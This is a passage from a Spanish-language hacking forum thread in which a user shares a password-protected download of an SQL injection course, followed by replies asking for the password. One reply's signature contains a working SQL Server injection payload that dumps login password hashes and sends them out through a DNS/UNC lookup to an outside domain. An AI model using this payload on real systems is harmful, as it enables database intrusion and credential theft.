Inyección SQL by N0rf

Iniciado por Jscript32, Septiembre 16, 2016, 09:59:41 AM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Septiembre 16, 2016, 09:59:41 AM Ultima modificación: Septiembre 04, 2017, 09:58:06 PM por xyz

+ ----------------- +
| explicación |
+ ----------------- +
¡Hola gente! Mi nombre es n0rf y voy a enseñarte inyección SQL!

La mayoría de los sitios web que contienen los inicios de sesión o cualquier tipo de tienda de fecha de usuario estos datos en una base de datos. Una base de datos es un montón de tablas que tienen un montón de columnas que tienen un montón de información.

base de datos de You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login podría tener tablas con columnas: usuario, contraseña, gmail_email ...

Los sitios que son vulnerables a la inyección de SQL permiten a los hackers para leer las bases de datos y el uso de la información para que sea!

EL archivo está en 4 partes en INGLES:

Link: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
CONTRASEÑA: Reverse AES: YNcfzOrccI+aLnd/I5Ggh9S7cA5cQw8vj9x3EHeHUxXbSZQj5lzKa35s4ZtGbvv7


Contraseña en claro: jscriptputoamo

Espero que os sirva este aporte
Java System

Alguien ha podido probar este cursito? vale la pena?

 :o :o :o :o yo pensaba que te llamabas Jscript32 pero nada, si eres n0rf, no seré yo quien le lleve la contraria a alguien con doble personalidad. ;D ;D ;D


Perdón por adelantado por que no es un comentario productivo pero es pronto y casi no he dormido así que tengo el humor tonto.

saludos n0rf


You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
alguien tiene el pass?

CONTRASEÑA: Reverse AES: YNcfzOrccI+aLnd/I5Ggh9S7cA5cQw8vj9x3EHeHUxXbSZQj5lzKa35s4ZtGbvv7

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
alguien tiene el pass?

There is no one more blind than he refuses to see.
1;declare @host varchar(800); select @host = name + '-' +
master.sys.fn_varbintohexstr(password_hash) + '.2.undisclosure.com' from
sys.sql_logins; exec('xp_fileexist ''\\' + @host + '\c$\boot.ini''');--

@You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login podes poner la pass en texto plano para no tener que eliminar tu post?

Saludos,
ANTRAX


Buenas.

Se actualizó el post con la contraseña en texto claro.

Un saludo !